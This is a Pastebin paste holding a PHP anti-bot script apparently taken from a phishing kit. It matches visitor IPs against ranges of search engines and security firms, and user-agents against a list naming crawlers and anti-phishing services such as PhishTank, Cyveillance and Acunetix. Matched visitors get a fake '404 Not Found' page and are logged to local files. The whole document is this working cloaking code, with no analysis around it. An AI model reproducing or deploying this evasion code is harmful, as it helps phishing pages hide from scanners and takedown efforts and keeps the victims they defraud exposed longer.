Neonprimetime

Bot Crawler Phishing Detection

Feb 18th, 2017
903
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?
  2.  
  3. $id = $_SERVER['REMOTE_ADDR'];
  4.  
  5. $ips = array(
  6.  
  7. "^66.211.160.86*", "^46.244.*.*", "^131.*.*.*", "^157.*.*.*", "^202.*.*.*", "^204.*.*.*", "^207.*.*.*", "^213.*.*.*", "^219.*.*.*", "^63.*.*.*", "^64.*.*.*", "^65.*.*.*", "^68.*.*.*", "^64.*.*.*", "^64.233.160.*", "^64.233.191.*", "^64.233.191.255*", "^66.102.*.*", "^66.249.*.*", "^72.14.*.*", "^74.125.*.*", "^209.85.*.*", "^216.239.*.*", "^64.4.*.*", "^65.52.*.*", "^131.253.*.*", "^157.54.*.*", "^207.46.*.*", "^207.68.*.*", "^8.12.*.*", "^66.196.*.*", "^66.228.*.*", "^67.195.*.*", "^68.142.*.*", "^72.30.*.*", "^74.6.*.*", "^98.136.*.*", "^202.160.*.*", "^209.191.*.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*",
  8.  
  9. );
  10.  
  11. foreach($ips as $ip) {
  12.  
  13. if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
  14.  
  15. header("HTTP/1.0 404 Not Found");
  16.  
  17. $ip = getenv("REMOTE_ADDR");
  18.  
  19. $file = fopen("001_bot.txt","a");
  20.  
  21. fwrite($file," user-agent : ".$_SERVER['HTTP_USER_AGENT']."\n ip : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
  22.  
  23. echo"<br>";
  24.  
  25. die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
  26.  
  27. }
  28.  
  29. }
  30.  
  31.  
  32.  
  33. $dp = strtolower($_SERVER['HTTP_USER_AGENT']);
  34.  
  35. $blocked_words = array(
  36.  
  37. "bot",
  38.  
  39. "above",
  40.  
  41. "google",
  42.  
  43. "softlayer",
  44.  
  45. "amazonaws",
  46.  
  47. "cyveillance",
  48.  
  49. "phishtank",
  50.  
  51. "dreamhost",
  52.  
  53. "netpilot",
  54.  
  55. "calyxinstitute",
  56.  
  57. "tor-exit",
  58.  
  59. "apache-httpclient",
  60.  
  61. "lssrocketcrawler",
  62.  
  63. "crawler",
  64.  
  65. "urlredirectresolver",
  66.  
  67. "jetbrains",
  68.  
  69. "spam",
  70.  
  71. "windows 95",
  72.  
  73. "windows 98",
  74.  
  75. "acunetix",
  76.  
  77. "netsparker",
  78.  
  79. "007ac9",
  80.  
  81. "008",
  82.  
  83. "192.comagent",
  84.  
  85. "200pleasebot",
  86.  
  87. "360spider",
  88.  
  89. "4seohuntbot",
  90.  
  91. "50.nu",
  92.  
  93. "a6-indexer",
  94.  
  95. "admantx",
  96.  
  97. "amznkassocbot",
  98.  
  99. "aboundexbot",
  100.  
  101. "aboutusbot",
  102.  
  103. "abrave spider",
  104.  
  105. "accelobot",
  106.  
  107. "acoonbot",
  108.  
  109. "addthis.com",
  110.  
  111. "adsbot-google",
  112.  
  113. "ahrefsbot",
  114.  
  115. "alexabot",
  116.  
  117. "amagit.com",
  118.  
  119. "analytics",
  120.  
  121. "antbot",
  122.  
  123. "apercite",
  124.  
  125. "aportworm",
  126.  
  127. "EBAY",
  128.  
  129. "CL0NA",
  130.  
  131. "jabber",
  132.  
  133. "ebay",
  134.  
  135. "arabot",
  136.  
  137. "hotmail!",
  138.  
  139. "msn!",
  140.  
  141. "outlook!",
  142.  
  143. );
  144.  
  145.  
  146.  
  147. foreach($blocked_words as $word2) {
  148.  
  149. if (substr_count($dp, strtolower($word2)) > 0 or $dp == "" or $dp == " " or $dp == " ") {
  150.  
  151. header("HTTP/1.0 404 Not Found");
  152.  
  153. $ip = getenv("REMOTE_ADDR");
  154.  
  155. $file = fopen("bot-_-.txt","a");
  156.  
  157. fwrite($file," user-agent : ".$_SERVER['HTTP_USER_AGENT']."\n ip : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
  158.  
  159. echo"<br>";
  160.  
  161. die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
  162.  
  163.  
  164.  
  165. }
  166.  
  167. }
  168.  
  169. ?>
RAW Paste Data